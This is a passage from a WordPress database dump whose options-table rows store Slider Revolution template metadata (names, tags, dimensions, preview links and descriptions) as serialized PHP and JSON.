13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:396;a:13:{s:2:\"id\";s:3:\"310\";s:6:\"handle\";s:19:\"Header_Light_02.png\";s:5:\"video\";s:19:\"Header_Light_02.mp4\";s:4:\"name\";s:15:\"Header_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:397;a:13:{s:2:\"id\";s:3:\"309\";s:6:\"handle\";s:21:\"Columns_4_Dark_01.png\";s:5:\"video\";s:21:\"Columns_4_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_4_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_4_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:398;a:13:{s:2:\"id\";s:3:\"308\";s:6:\"handle\";s:18:\"Header_Dark_01.png\";s:5:\"video\";s:18:\"Header_Dark_01.mp4\";s:4:\"name\";s:14:\"Header_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:399;a:13:{s:2:\"id\";s:3:\"307\";s:6:\"handle\";s:19:\"Caption_Dark_03.png\";s:5:\"video\";s:19:\"Caption_Dark_03.mp4\";s:4:\"name\";s:15:\"Caption_Dark_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:400;a:13:{s:2:\"id\";s:3:\"306\";s:6:\"handle\";s:21:\"Columns_3_Dark_01.png\";s:5:\"video\";s:21:\"Columns_3_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_3_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_3_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:401;a:13:{s:2:\"id\";s:3:\"305\";s:6:\"handle\";s:19:\"Caption_Dark_05.png\";s:5:\"video\";s:19:\"Caption_Dark_05.mp4\";s:4:\"name\";s:15:\"Caption_Dark_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_05\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:402;a:13:{s:2:\"id\";s:3:\"304\";s:6:\"handle\";s:20:\"Caption_Light_06.png\";s:5:\"video\";s:20:\"Caption_Light_06.mp4\";s:4:\"name\";s:16:\"Caption_Light_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_06\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:403;a:13:{s:2:\"id\";s:3:\"303\";s:6:\"handle\";s:19:\"Header_Light_01.png\";s:5:\"video\";s:19:\"Header_Light_01.mp4\";s:4:\"name\";s:15:\"Header_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:404;a:13:{s:2:\"id\";s:3:\"302\";s:6:\"handle\";s:20:\"Caption_Light_03.png\";s:5:\"video\";s:20:\"Caption_Light_03.mp4\";s:4:\"name\";s:16:\"Caption_Light_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:405;a:13:{s:2:\"id\";s:3:\"301\";s:6:\"handle\";s:19:\"Caption_Dark_01.png\";s:5:\"video\";s:19:\"Caption_Dark_01.mp4\";s:4:\"name\";s:15:\"Caption_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:406;a:13:{s:2:\"id\";s:3:\"300\";s:6:\"handle\";s:21:\"PromoCode_Dark_01.png\";s:5:\"video\";s:21:\"PromoCode_Dark_01.mp4\";s:4:\"name\";s:17:\"PromoCode_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"PromoCode_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:407;a:13:{s:2:\"id\";s:3:\"299\";s:6:\"handle\";s:19:\"Caption_Dark_02.png\";s:5:\"video\";s:19:\"Caption_Dark_02.mp4\";s:4:\"name\";s:15:\"Caption_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:408;a:13:{s:2:\"id\";s:3:\"298\";s:6:\"handle\";s:18:\"Header_Dark_02.png\";s:5:\"video\";s:18:\"Header_Dark_02.mp4\";s:4:\"name\";s:14:\"Header_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:409;a:13:{s:2:\"id\";s:3:\"297\";s:6:\"handle\";s:22:\"Columns_3_Light_01.png\";s:5:\"video\";s:22:\"Columns_3_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_3_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_3_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:410;a:13:{s:2:\"id\";s:3:\"296\";s:6:\"handle\";s:20:\"Caption_Light_01.png\";s:5:\"video\";s:20:\"Caption_Light_01.mp4\";s:4:\"name\";s:16:\"Caption_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:411;a:13:{s:2:\"id\";s:3:\"295\";s:6:\"handle\";s:19:\"Caption_Dark_04.png\";s:5:\"video\";s:19:\"Caption_Dark_04.mp4\";s:4:\"name\";s:15:\"Caption_Dark_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_04\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:412;a:13:{s:2:\"id\";s:3:\"294\";s:6:\"handle\";s:20:\"Caption_Light_02.png\";s:5:\"video\";s:20:\"Caption_Light_02.mp4\";s:4:\"name\";s:16:\"Caption_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_02\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:413;a:13:{s:2:\"id\";s:3:\"293\";s:6:\"handle\";s:20:\"Caption_Light_04.png\";s:5:\"video\";s:20:\"Caption_Light_04.mp4\";s:4:\"name\";s:16:\"Caption_Light_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_04\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:414;a:13:{s:2:\"id\";s:3:\"292\";s:6:\"handle\";s:22:\"Columns_4_Light_01.png\";s:5:\"video\";s:22:\"Columns_4_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_4_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_4_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:415;a:13:{s:2:\"id\";s:3:\"291\";s:6:\"handle\";s:20:\"Caption_Light_05.png\";s:5:\"video\";s:20:\"Caption_Light_05.mp4\";s:4:\"name\";s:16:\"Caption_Light_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_05\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:416;a:13:{s:2:\"id\";s:3:\"290\";s:6:\"handle\";s:22:\"PromoCode_Light_01.png\";s:5:\"video\";s:22:\"PromoCode_Light_01.mp4\";s:4:\"name\";s:18:\"PromoCode_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"PromoCode_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}}s:4:\"tags\";a:18:{i:28;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}i:5;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:20;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:21;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:25;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:16;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}i:26;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}i:18;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:4;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:19;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:23;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}i:3;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:24;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}i:22;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:29;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}i:27;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}}','no'),(228,'revslider-templates-check','1719610419','yes'),(229,'revslider-templates-hash','adb124a80d1ef0a591c3197a97b2d096','yes'),(230,'rs-templates-new','','no');
INSERT INTO `wpev_options` VALUES (231,'rs-templates','{\"hash\":\"373a2b4a85b974d26bb5d8ddc22d2914\",\"slider\":{\"0\":{\"id\":\"1\",\"title\":\"Classic Carousel\",\"alias\":\"classic-carousel\",\"zip\":\"classic-carousel.zip\",\"uid\":\"146a01dd380c0cdee85c4456ee68cd84\",\"img\":\"classic-carousel\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/carousel-slider-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=carousel-slider-plugin\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">Our classic, full-width carousel example. Drag, swipe or click to navigate!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2016-02-22 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"1\":{\"id\":\"2\",\"title\":\"Classic Slider\",\"alias\":\"classicslider\",\"zip\":\"classicslider.zip\",\"uid\":\"a0d6a9248c9066b404ba0f1cdadc5cf2\",\"img\":\"classicslider\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-slideshow-gallery\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-slideshow-gallery\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\" <span class=\\\"ttm_content\\\">A classic slideshow example with timer, bullets and arrow navigation.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"2\":{\"id\":\"3\",\"title\":\"Content Tabs\",\"alias\":\"contenttabs\",\"zip\":\"contenttabs.zip\",\"uid\":\"e02e91604b690123a3d07a65582c4fd0\",\"img\":\"contenttabs\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-content-tabs-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-content-tabs-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1024\",\"height\":\"600\",\"description\":\" <span class=\\\"ttm_content\\\">An auto-size slider with a cool split-text animation effect. Navigate with vertical bullets and thumbs.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"3\":{\"id\":\"4\",\"title\":\"Facebook Feed\",\"alias\":\"facebook-feed\",\"zip\":\"facebook-feed.zip\",\"uid\":\"5506431d5b1babcb25dcf52c508d42e3\",\"img\":\"facebook-feed\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-facebook-feed\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-facebook-feed\",\"version\":\"1.0.1\",\"required\":\"5.0.5\",\"width\":\"800\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\"> This slider is automatically populated by a Facebook stream. Just one slide is needed to show a whole feed!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The content source is set to <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/module-content\\/#flickr\\\" target=\\\"_blank\\\">\\\"Facebook Stream\\\"<\\/a>. Make sure to input your correct API information in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"socialmedia\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"4\":{\"id\":\"5\",\"title\":\"Fashion\",\"alias\":\"fashion\",\"zip\":\"fashion.zip\",\"uid\":\"4f4b914d6db35e19101ff003c4e7ea3a\",\"img\":\"fashion\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-one-page-slider-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-one-page-slider-theme\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"  <span class=\\\"ttm_content\\\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or bullets.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"5\":{\"id\":\"6\",\"title\":\"Flickr Gallery\",\"alias\":\"flickr-gallery\",\"zip\":\"flickr-gallery.zip\",\"uid\":\"ad85cfac7acfa678e6a1b8febfee51ed\",\"img\":\"flickr-gallery\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-flickr-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-flickr-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"800\",\"height\":\"640\",\"description\":\" <span class=\\\"ttm_content\\\"> This slider is automatically populated by a Flickr stream. Just one slide is needed to show a whole feed!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"socialmedia\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"6\":{\"id\":\"7\",\"title\":\"Gym\",\"alias\":\"gym\",\"zip\":\"gym.zip\",\"uid\":\"e4d81f13f96fb9bc905f4ad89615032b\",\"img\":\"gym\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/one-page-wordpress-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=one-page-wordpress-slider\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the slider menu.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Instructions for <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/modify-burger-menu\\/\\\" target=\\\"_blank\\\">changing the menu<\\/a>.<\\/span><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"7\":{\"id\":\"8\",\"title\":\"Highlight Carousel\",\"alias\":\"highlight-carousel\",\"zip\":\"highlight-carousel.zip\",\"uid\":\"ada52163f723a942f782351fa0396b3d\",\"img\":\"highlight-carousel\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-swipe-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-swipe-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"800\",\"height\":\"720\",\"description\":\"  <span class=\\\"ttm_content\\\">A swipe-controlled carousel with an additional tab-based navigation.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\\r\\n\",\"cat\":\"Revolution Base\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"8\":{\"id\":\"9\",\"title\":\"Highlight Showcase\",\"alias\":\"highlight-showcase\",\"zip\":\"highlight-showcase.zip\",\"uid\":\"2bfe0bd410fb48fec9d942eab1e21530\",\"img\":\"highlight-showcase\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-parallax-slideshow\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-slideshow\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1230\",\"height\":\"720\",\"description\":\"<span class=\\\"ttm_content\\\">A tab-based navigation, a slideshow timer and cool animations make this slider interesting!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"9\":{\"id\":\"10\",\"title\":\"Image Hero\",\"alias\":\"image-hero\",\"zip\":\"imagehero.zip\",\"uid\":\"7db18781d44f2adc28c962440894aac1\",\"img\":\"imagehero\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-hero-image\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-hero-image\",\"version\":\"1.0.2\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">A commonly used full-width image hero block with texts.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"10\":{\"id\":\"11\",\"title\":\"Instagram 